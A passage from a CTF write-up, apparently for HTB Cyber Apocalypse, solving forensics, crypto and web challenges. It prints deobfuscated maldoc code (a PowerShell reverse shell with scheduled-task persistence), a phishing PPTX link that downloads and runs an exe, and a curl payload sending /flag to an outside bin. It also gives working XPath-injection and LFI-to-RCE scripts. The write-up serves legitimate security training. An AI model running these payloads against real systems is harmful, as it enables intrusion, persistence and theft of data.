4AZAAsACAASQBuAHQAMwAyACAAbgBDAG0AZABTAGgAbwB3ACkAOwAKACcAOwAKAFsAQwBvAG4AcwBvAGwA'b'ZQAuAFcAaQBuAGQAbwB3AF0AOgA6'b'AF
MAaABvAHcAVwBpAG4AZABvAHcAKABbAEMAbwBuAHMAbwBsAGUALgBXAGkAbgBkAG8AdwBdADoAOgBHAG'b'UAdABDAG8AbgBzAG8AbABlAFcAaQBuAGQAb
wB3ACgAKQAsACAA'b'MAApADsACgAKAAoAaQBmACAAKAAkAHAAYQB5AGwAbwBhAGQAQgBhAHMAZQA2ADQAIAAtAG0AYQB0AGMAaAAgACIA'b'aAB0AHQAc
AA6AHwAaAB0AHQAcABzADoAIgApACAAewAK'b'ACAAIAAgACAAJABwAGEAeQBsAG8AYQBkAEIAYQBzAGUANgA0ACAAPQAgACgATgBlAHcALQBPAGIA'b'a
gBlAGMAdAAgACIATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAAiACkA'b'LgBEAG8AdwBuAGwAbwBhAGQAUwB'b'0AHIAaQBuAGcAKAAkAHAAYQB5AGwAb
wBhAGQAQgBhAHMAZQA2ADQAKQA7AAoAfQAKAAoAJABpAG4AcwB0AGEAbABsAGUAZAAgAD0AIABH'b'AGUAdAAtAEkAdA'b'BlAG0AUAByAG8AcABlAHIAd
AB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAAkACgAJAByAGUAZwBwACkAIgAgAC0A'b'TgBhAG0AZ'b'QAgACIAJ
AAoACQAcgBlAGcAbgApACIAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwAKAAoACgBpAGYAIAAoACQAaQBuAHMAdABh'b'
AGwAbABlAGQA'b'KQAgAHsACgAKAAoAIAAgACAAIABpAGYAIAAoACQAaQBuAHMAdABhAGwAbABlAGQAIAAtAG4AZQAgACQAcABhAHkAbABvAGEAZABCAGE
AcwBlADYANAApACAA'b'ewAKACAAIAAgACAAIAAgACAAIABTAGUAdAAtAEkAdA'b'BlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEs
AQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAAk'b'ACgAJAByAGUAZwBwACkAIgAgAC0ATgBhAG'b'0AZQAgACIAJAAoACQAcgBlAGcAbgApACIAIAAtAEY
AbwByAGMAZQAgAC0AVgBhAGwAdQBlACAAJABwAGEAeQBsAG8AYQBkAEIA'b'YQBzAGUANgA0ADsACgAgACAAIAAgAH0ACgAKACMAIABpAG4AcwB0AGEAbA
BsAGEAdABpAG8AbgAKAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAACgAKACAAIAAgACA'b'AaQBm'b'ACAAKAAkAEYAQQBMAFMARQAgAC0AZQBxACAAKA
BUAGUAcwB0AC0AUABhAHQAaA'b'AgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAJAAoACQA'b'cgBlAGcAcAApAFwAIg
ApACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAE4AZQ'b'B3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBl'
b'AFwAJAAoACQAcgBlAGcAcAApACIAOwAKACAAIAAgACAAfQAKACAAIAAgACAAUw'b'BlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhA
HQAaAAgACIASABLAEMA'b'VQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAJAAoACQA'b'cgBlAGcAcAApACIAIAAtAE4AYQBtAGUAIAAiACQAKAAkAHIAZQBnA
G4AKQAiACAALQBGAG8AcgBjAGUAIAAtAFYAYQBs'b'AHUAZQAgACQAcABhAHkAbABvAGEAZABCAGEAcwBlADYANAA7AAoAIAAg'b'ACAAIAAKACAAIAAgA
CAACgAgACAAIAAgACQAdQAgAD0AIABbAEUAbgB2AGkAcgBvAG4AbQBlAG4A'"
uejdkidq = "b'dABdADoAOgBVAHMAZQByAE4AYQBtAGUAOwAKACAAIAAgACAACgAgACAAIAAgAAoAIAAgACAAIAAkAHQAYQBzAGsAIAA9ACAARwBlAHQA
LQBTAGMAaABlAGQAdQBsAGUAZ'b'ABU'b'AGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAiACQAKAAkAHIAZQBnAHAAKQAkACg'b'AJAByAGUAZwBuA
CkAIgAgAC0AZQBhACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQA'b'aQBuAHUAZQA7AAoAIAAgACAAIABpAGYAIAAoACQAdABhAHMAawApACAAewAKACAA
IAA'b'gACAAIAAgACAAIABVAG4AcgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABl'b'AGQAVABhAHMAawAgAC0AVABhAHMAawBOAGE'b'AbQBlA
CAAIgAkACgAJAByAGUAZwBwACkAJAAoACQAcgBlAGcAbgApACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMA'b'ZQA7AAoAIAAgACAAIAB9AAoA
IAAgACAAIAAKACAAIAAgACAACgAgACAAIAAgACQAYQAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQ'b'AYQBzAGsAQQBjAHQAaQBv'b'AG4A
IAAtAEUAeABlAGMAdQB0AGUAIAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAiACAAIgAtAHcAIABoAGkAZABkAGU'b'AbgAgAC0ARQB4AGUAYwB
1AHQAaQBvAG4A'b'UABvAGw'b'AaQBjAHkAIABCAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAE4AbwBFAHgAaQB0ACAALQBDACAAVwByAGkAdABlAC0AaAB
vAHMAdAAgACcAVwBpAG4AZABvAHcAcwAg'b'AHUAcA'b'BkAGEAdABlACAAcgBlAGEAZAB5ACcAOwAgAGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVAB
lAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4A'b'RwBlAHQ'b'AUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgB
lAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAt'b'AEkAdABlAG0AUAByAG8AcABlAHIAdAB5AC'b'AASAB
LAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAJAAoACQAcgBlAGcAcAApACkALgAkACgAJAByAGUAZwBuACkAKQApACkA'b'OwAiADsACgAgACAAIAAgAC
QAdAAgAD0AIABOAGUAdwAtAFMAYwBoA'b'GUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgAgAC0AVQBz'b'AG
UAcgAgACIAJAAoACQAdQApACIAOwA'b'KACAAIAAgACAAJABwACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBQAHIAaQBuAGMAa
QBwAGEAbAAgACIA'b'JAAoACQAdQApACIAOwAKACAAIAAgACAAJABzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0
A'b'GkAbgBnAHMAUwBlAHQAIAAtAEgAaQBk'b'AGQAZQBuADsA'b'CgAgACAAIAAgACQAZAAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAY
QBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABhACAALQBUAHIAaQBnAGcA'b'ZQByACAAJAB0ACAALQBQAHIAaQBuAGMAaQBwAGEAbAAgACQAcAAgAC0AUwBl
AHQAdABpAG4AZwBzACAAJABzADsACgAgACAAIAAgAFIAZQBnAGkAcwB0AGUAcgAtAFM'b'AYwBo'b'AGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAiACQAKAAk
AHIAZQBnAHAAKQAkACgAJAByAGUAZ'b'wBuACkAIgAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABkADsACgB9AAoA'b'CgAKAGkAZQB4ACAAKAB'
b'bAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBz'b'
AHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEI'b'AYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABwAGEAeQBsAG8AYQBkAEIAYQBzAGU
ANgA0ACkAKQApADsACgAKAA=='"
x = Shell(odsuozldxufm("50b'OWERSHELL.ex'b'e -noexit -w hidd'b'en -enc '") & bomazpcuwhstlcd & dbcsmjrdsqm & gxiwcxqzq
i & uejdkidq, 1)
End Function

...skipping 1 line
Private Function odsuozldxufm(ByVal gwndcowqyulk As String) As String
Dim cjzkqjwvtdxr As Long
For cjzkqjwvtdxr = 1 To Len(gwndcowqyulk) Step 2
odsuozldxufm = odsuozldxufm & Chr$(Val("&H" & Mid$(gwndcowqyulk, cjzkqjwvtdxr, 2)))
Next cjzkqjwvtdxr
End Function
.....
.....
. ( $PshomE[4]+$pshoMe[30]+'x') ( [strinG]::join('' , ([REGeX]::MaTCHES( ")'x'+]31[DIlLeHs$+]1[DiLLehs$ (&| )43]RAhc[]GnIRTs[,'tXj'(eCALPER.)'$','wqi'(eCALPER.)';tX'+'jera_scodlam'+'{B'+'T'+'HCtXj '+'= p'+'gerwqi'(" ,'.' ,'R'+'iGHTtOl'+'eft' ) | FoREaCH-OBJecT {$_.VALUE} )) )

$payloadBase64 = "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADYALgAyADMAMwAzAC4ANQA0AC4AMgAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==";

//$payloadBase64 = "$client = New-Object System.Net.Sockets.TCPClient("196.2333.54.2",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

SEt ("G8"+"h") ( " ) )63]Rahc[,'raZ'EcalPeR- 43]Rahc[,)05]Rahc[+87]Rahc[+94]Rahc[( eCAlpERc- )';2'+'N'+'1'+'}atem_we'+'n_eht'+'_2N1 = n'+'gerr'+'aZ'(( ( )''niOj-'x'+]3,1[)(GNirTSot.EcNereFeRpEsOBREv$ ( . " ) ;-jOIn ( lS ("VAR"+"IaB"+"LE:g"+"8H") ).VALue[ - 1.. - ( ( lS ("VAR"+"IaB"+"LE:g"+"8H") ).VALue.LengtH)] | IeX 

Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();

[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
';
[Console.Window]::ShowWindow([Console.Window]::GetConsoleWindow(), 0);

if ($payloadBase64 -match "http:|https:") {
  $payloadBase64 = (New-Object "Net.Webclient").DownloadString($payloadBase64);
}

$installed = Get-ItemProperty -Path "HKCU:\Software\$($regp)" -Name "$($regn)" -ea SilentlyContinue;

if ($installed) {

  if ($installed -ne $payloadBase64) {
    Set-ItemProperty -Path "HKCU:\Software\$($regp)" -Name "$($regn)" -Force -Value $payloadBase64;
  }

# installation
} else {

  if ($FALSE -eq (Test-Path -Path "HKCU:\Software\$($regp)\")) {
    New-Item -Path "HKCU:\Software\$($regp)";
  }
  Set-ItemProperty -Path "HKCU:\Software\$($regp)" -Name "$($regn)" -Force -Value $payloadBase64;

  $u = [Environment]::UserName;

  $task = Get-ScheduledTask -TaskName "$($regp)$($regn)" -ea SilentlyContinue;
  if ($task) {
    Unregister-ScheduledTask -TaskName "$($regp)$($regn)" -Confirm:$false;
  }

  $a = New-ScheduledTaskAction -Execute "powershell.exe" "-w hidden -ExecutionPolicy Bypass -nop -NoExit -C Write-host 'Windows update ready'; iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\$($regp)).$($regn))));";
  $t = New-ScheduledTaskTrigger -AtLogOn -User "$($u)";
  $p = New-ScheduledTaskPrincipal "$($u)";
  $s = New-ScheduledTaskSettingsSet -Hidden;
  $d = New-ScheduledTask -Action $a -Trigger $t -Principal $p -Settings $s;
  Register-ScheduledTask "$($regp)$($regn)" -InputObject $d;
}

iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($payloadBase64)));
. ( $PshomE[4]+$pshoMe[30]+'x') ( [strinG]::join('' , ([REGeX]::MaTCHES( ")'x'+]31[DIlLeHs$+]1[DiLLehs$ (&| )43]RAhc[]GnIRTs[,'tXj'(eCALPER.)'$','wqi'(eCALPER.)';tX'+'jera_scodlam'+'{B'+'T'+'HCtXj '+'= p'+'gerwqi'(" ,'.' ,'R'+'iGHTtOl'+'eft' ) | FoREaCH-OBJecT {$_.VALUE} )) )

image

image

('iqwreg'+'p ='+' jXtCH'+'T'+'B{'+'maldocs_arej'+'Xt;').REPLACe('iqw','$').REPLACe('jXt',[sTRInG][chAR]34) |&( $sheLLiD[1]+$sHeLlID[13]+'x')

image

So we got the flag: CHTB{maldocs_are_the_new_meta}

4.AlienPhish

forensics_alienphish.zip

image

image

┌──(kali㉿kali)-[~/Desktop/HTB/AlienPhise]
└─$ unzip Alien\ Weaknesses.pptx
Archive: Alien Weaknesses.pptx
 inflating: [Content_Types].xml
 inflating: _rels/.rels
 inflating: ppt/slides/_rels/slide1.xml.rels
 inflating: ppt/_rels/presentation.xml.rels
 inflating: ppt/presentation.xml
 inflating: ppt/slides/slide1.xml
 inflating: ppt/slideLayouts/_rels/slideLayout5.xml.rels
 inflating: ppt/slideLayouts/_rels/slideLayout8.xml.rels
 inflating: ppt/slideLayouts/_rels/slideLayout10.xml.rels
 inflating: ppt/slideLayouts/_rels/slideLayout11.xml.rels
 inflating: ppt/slideLayouts/_rels/slideLayout9.xml.rels
 inflating: ppt/slideLayouts/_rels/slideLayout6.xml.rels
 inflating: ppt/slideMasters/_rels/slideMaster1.xml.rels
 inflating: ppt/slideLayouts/_rels/slideLayout1.xml.rels
 inflating: ppt/slideLayouts/_rels/slideLayout2.xml.rels
 inflating: ppt/slideLayouts/_rels/slideLayout3.xml.rels
 inflating: ppt/slideLayouts/_rels/slideLayout7.xml.rels
 inflating: ppt/slideLayouts/slideLayout11.xml
 inflating: ppt/slideLayouts/slideLayout10.xml
 inflating: ppt/slideLayouts/slideLayout3.xml
 inflating: ppt/slideLayouts/slideLayout2.xml
 inflating: ppt/slideLayouts/slideLayout1.xml
 inflating: ppt/slideMasters/slideMaster1.xml
 inflating: ppt/slideLayouts/slideLayout4.xml
 inflating: ppt/slideLayouts/slideLayout5.xml
 inflating: ppt/slideLayouts/slideLayout6.xml
 inflating: ppt/slideLayouts/slideLayout7.xml
 inflating: ppt/slideLayouts/slideLayout8.xml
 inflating: ppt/slideLayouts/slideLayout9.xml
 inflating: ppt/slideLayouts/_rels/slideLayout4.xml.rels
 inflating: ppt/theme/theme1.xml
 extracting: ppt/media/image1.png
 extracting: ppt/media/image2.png
 extracting: docProps/thumbnail.jpeg
 inflating: ppt/presProps.xml
 inflating: ppt/tableStyles.xml
 inflating: ppt/viewProps.xml
 inflating: docProps/app.xml
 inflating: docProps/core.xml
┌──(kali㉿kali)-[~/…/AlienPhise/ppt/slides/_rels]
└─$ strings slide1.xml.rels
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&&for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&&if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe" TargetMode="External"/></Relationships>
Target="cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&&for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&&if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22"
neila -> alien
htraeyortsed -> destroyearth
ptth -> http

22%52%=!XCk*:XCk52%02%llac02%002%qel02%X52%02%fi;pma&;pma&!1,X52%~:My!!XCk!=XCk02%tes02%od)0;1-;221(02%ni02%X52%02%L/02%rof;pma&;pma&powershell02%-c02%22%$o02%=02%$env:temp02%+02%'Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99.exe';02%iwr02%http:/destroyearth.alien/x.exe02%-outfile02%$o22%=My02%tes22%C/NO:V/02%exe.dmc"=tegraT
>>> import base64
>>> flag = "Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM="
>>> base64.b64decode(flag)
b'CHTB{pH1sHiNg_w0_m4cr0s'

So we got the flag: CHTB{pH1sHiNg_w0_m4cr0s}

5.Low Energy Crypto

forensics_low_energy_crypto.zip

image

image

image

-----BEGIN PUBLIC KEY-----
MGowDQYJKoZIhvcNAQEBBQADWQAwVgJBAKKPHxnmkWVC4fje7KMbWZf07zR10D0m
B9fjj4tlGekPOW+f8JGzgYJRWboekcnZfiQrLRhA3REn1lUKkRAnUqAkCEQDL/3Li
4l+RI2g0FqJvf3ff
-----END PUBLIC KEY-----

image

image

┌──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]
└─$ cat ciphertext  
9)i�▒�����^E����x�9��w��bm�@�9*����"�B���c��������pw��8                                              
┌──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]
└─$ openssl rsa -in ./publickey -text -inform PEM -pubin
RSA Public-Key: (512 bit)
Modulus:
  00:a2:8f:1f:19:e6:91:65:42:e1:f8:de:ec:a3:1b:
  59:97:f4:ef:34:75:d0:3d:26:07:d7:e3:8f:8b:65:
  1a:43:ce:5b:e7:fc:24:6c:e0:60:94:56:6e:87:a4:
  72:76:5f:89:0a:cb:46:10:37:44:49:f5:95:42:a4:
  44:09:d4:a8:09
Exponent:
  00:cb:ff:72:e2:e2:5f:91:23:68:34:16:a2:6f:7f:
  77:df
writing RSA key
-----BEGIN PUBLIC KEY-----
MGowDQYJKoZIhvcNAQEBBQADWQAwVgJBAKKPHxnmkWVC4fje7KMbWZf07zR10D0m
B9fjj4tlGkPOW+f8JGzgYJRWboekcnZfiQrLRhA3REn1lUKkRAnUqAkCEQDL/3Li
4l+RI2g0FqJvf3ff
-----END PUBLIC KEY-----
p = 92270847179792937622745249326651258492889546364106258880217519938223418249279

q = 92270847179792937622745249326651258492889546364106258880217519938223418258871

e = 271159649013582993327688821275872950239
──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]
└─$ python3 rsatool.py -p 92270847179792937622745249326651258492889546364106258880217519938223418249279 -q 92270847179792937622745249326651258492889546364106258880217519938223418258871 -e 271159649013582993327688821275872950239 -o private 
Using (p, q) to initialise RSA instance

n =
a28f1f19e6916542e1f8deeca31b5997f4ef3475d03d2607d7e38f8b651a43ce5be7fc246ce06094
566e87a472765f890acb4610374449f59542a44409d4a809

e = 271159649013582993327688821275872950239 (0xcbff72e2e25f9123683416a26f7f77df)

d =
587f5ba09f76fa1f56ddb4bcbe27a2c280f1fe2b51347253eba6b8cf8c53b5a4f524c5a7f1b3c3b2
b0c0dd4f9541c7b7594522f1edc09f4d55914ca4a3c1828f

p =
cbff72e2e25f9123683416a26f7f77cb7199bbe424b9f138dc0dc130b3c2103f

q =
cbff72e2e25f9123683416a26f7f77cb7199bbe424b9f138dc0dc130b3c235b7

Saving PEM as private

┌──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]
└─$ cat private              
-----BEGIN RSA PRIVATE KEY-----
MIIBRwIBAAJBAKKPHxnmkWVC4fje7KMbWZf07zR10D0mB9fjj4tlGkPOW+f8JGzgYJRWboekcnZf
iQrLRhA3REn1lUKkRAnUqAkCEQDL/3Li4l+RI2g0FqJvf3ffAkBYf1ugn3b6H1bdtLy+J6LCgPH+
K1E0clPrprjPjFO1pPUkxafxs8OysMDdT5VBx7dZRSLx7cCfTVWRTKSjwYKPAiEAy/9y4uJfkSNo
NBaib393y3GZu+QkufE43A3BMLPCED8CIQDL/3Li4l+RI2g0FqJvf3fLcZm75CS58TjcDcEws8I1
twIgJXpkF+inPgZETjVKdec6UGg75ZwW3WTPEoVANux3DscCIDjx+RSYECVaraeGG2O/v8iKe6dn
1GpMVGUuaKecISArAiA0QRYkZFB5D4BnOxGkMX3ihjn7NFPQ7+Jk/abWRRq6+w==
-----END RSA PRIVATE KEY-----

┌──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]
└─$ openssl rsautl -decrypt -raw -inkey private -in ciphertext 
�5����p+wɹ�[R�.;���^�bs� �6yCHTB{5p34k_fr13nd_4nd_3n73r}

(Bài này kết thúc giải rồi mình mới ra do hơi gà về crypyo hehe)

So we got the flag: CHTB{5p34k_fr13nd_4nd_3n73r}

/HardWare/

1. Serial Log

image

hw_serial_logs.zip

Ngoài Reverse Engineer, Forensics nay mình kiếm thêm niềm vui mới với duy nhất 1 bài Hardware kk ?

image

image

image

image

image

image

image

image

image

/Web Exploitation/

1. Caas

Nhìn vào source code ta thấy, chall được code theo MCV

flag ở / và ta chỉ cần quan tâm tới 2 file đó là controllers và model Ở controller

Có vẻ như đây là một bài command injection, nhân ip và gọi tới commandmodel

Nhìn vào model file thì đúng thật, sử dụng curl tới ip mà ta có thể control. với curl ta có một option để đọc file và gửi đi

from stackover vậy ta có thể đọc file flag ở root dir và gửi đi thôi. ez game ip=--data "@/flag" https://requestbin.io/15qgycy1

2. MiniSTRyplace

Tiếp tục download source về và đọc code ta để tìm điểm exploit

Ta thấy đây là một bài lfi đơn giản, chỉ filter ../ nhưng không đệ quy nên ta có thể sử dụng ....// để bypass flag ở root dir nên chỉ cần sử dụng payload sau để có flag

3. Wild Goose Hunt

Nhìn vào source code ta thấy, Có vẻ đây là một bài sqli, và mình không thấy flag ở đâu trong source nên mình đoán flag ở trong db hoặc có thể là password, app sử dụng mongo db Với kinh nghiệm của mình thì đây có thể bị nosqli lets try $ne nghĩa là not equal, vậy tới đây mình sử dụng regex để brute password Tới đây có thể viết 1 đoạn code ngắn để brute những chữ còn lại trong flag ref: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

4. E.Tree

Bài này chỉ cho mỗi file xml Nhằm nói cho chúng ta biết cấu trúc của thằng này nothing! hmmm vì không có source nên mình phải fuzz để tìm ra thứ có ích cho mình got it, mình thậm chí có thể đọc được code của hàm search luôn, nó sử dụng thư viện lxml để truy vấn xpath, vậy bài này có thể là xpath injection tiếp tục fuzz kết hợp search gg về xpath injection mình tìm được một số payload khá giống với sqli tiếp tục thử cho tới khi mình tìm được payload sau ừm huh {"search":"John Doe' or substring(//military/district[2]//selfDestructCode,1,1)='C"} flag chia làm 2 phần 1 ở district[2] và district[3] nên ta sẽ brute như blind sqli thôi script sovlve

import requests

url = "http://206.189.121.131:30353/api/search"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "*/*", "Accept-Language": "vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://206.189.121.131:30353/", "Content-Type": "application/json", "Origin": "http://206.189.121.131:30353", "DNT": "1", "Connection": "close"}
flag="CHTB{"
flag=""
for i in range(1,30):
  print(i)
  for j in range(48,128):

    #print(chr(j))
    json={"search": f"x' or substring(//military/district[3]//selfDestructCode,{i},1)='{chr(j)}"}
    #print(json)
    r=requests.post(url, headers=headers, json=json)
    if "This millitary staff member exists" in r.text:
      flag+=chr(j)
      print("flag:"+flag)
      break

5. Extortion

Bài này thì không có source nhưng mình có thể dễ dàng fuzz ra được bài này bị gì lfi là rõ, nhưng lfi ở đây như thế nào? thử với f=n3mo

ta biết được cú pháp include của chall như sau include("files/".$_GET['f']) vậy ta không thể sử dụng bất kỳ schema nào ở để để đọc source :(, ngoài ra chall còn có một chức năng là send nhưng không biết send gì. mình đoán ngay nếu biết send.php làm gì thì sẽ win this chall nhưng tại thời điểm đó mình không fuzz ra được send.php làm gì. với những lfi mà không thể làm gì tiếp theo, mình mạnh dạn thử session upload process

import sys
import string
import requests
from base64 import b64encode
from random import sample, randint
from multiprocessing.dummy import Pool as ThreadPool

HOST = 'http://138.68.177.159:31640/'
sess_name = '8ad468a3766fa95b2d489b7097dbbd55'

headers = {
  'Connection': 'close', 
  'Cookie': 'PHPSESSID=' + sess_name
}

payload = '<?php echo "n3mo123";?>'

def runner1(i):

  data = {
    'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + payload + 'Z'
  }
  i=0
  while 1:
    i+=1
    if i%100==0:
      print("try[+]:"+chr(i))
    fp = open('/etc/passwd', 'rb')
    r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
    fp.close()

def runner2(i):
  filename = '../../../../../tmp/sess_' + sess_name

  # print filename
  while 1:
    url = '%s?f=%s' % (HOST, filename)
    r = requests.get(url, headers=headers)
    c = r.text
    if c and 'n3mo123' in c:
      print(c)

if sys.argv[1] == '1':
  runner = runner1
else:
  runner = runner2

pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)

oke it work, nhưng trong khi thử cách này thì mình nhận ra chức năng của send.php, send.php nhận đầu vào của mình và lưu vào session, simple hơn so với cách trên. nên mình sẽ đi theo hướng của author trươc. sau khi biết được chức năng của php là ghi vào session, mà session mặc định được lưu ở /tmp/sess_sessid, vậy mình có write file + include? ngại gì mà không RCE? send 2 request sau and got RCE => done casch2: sử dụng script trên của mình để rce

6. The Galactic Times

